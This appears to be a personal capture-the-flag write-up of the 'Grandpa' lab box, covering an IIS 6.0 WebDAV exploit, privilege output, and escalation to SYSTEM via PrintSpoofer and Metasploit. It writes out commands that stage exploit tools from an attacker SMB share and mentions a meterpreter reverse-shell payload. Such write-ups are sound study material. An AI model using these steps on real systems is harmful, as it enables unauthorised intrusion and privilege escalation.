Grandpa
Personal Rating: Medium
I rated this box medium, because I did it with Metasploit and it would have taken more effort and different steps to do it without, which was not easy for me at the time.
Initial Access
nmap:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
OS: Windows older than Server 2008 or Windows 7
Searching for the IIS version I find CVE-2017-7269 everywhere. There is a PoC:
This worked and I have a shell as network service.

Privilege Escalation
C:\>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
With the SeImpersonate privilege we should be able to privesc using Printspoofer.
With smbserver.py I transferred the printspoofer exploit on the host. For this to work I needed to find the writeable directory C:\wmpub\wmiislog.
sudo smbserver.py -smb2support soos .
copy \\10.10.16.2\soos\PrintSpoofer32.exe .\PrintSpoofer32.exe
This did not work and made the shell inaccessible.
I transferred a windows/meterpreter/reverse_tcp payload to the host and ran it:
cmd shell.exe
I then used this exploit to get system: windows/local/ms14_058_track_popup_menu
I know that this is the easy way and you should be able to do this without metasploit.
Last updated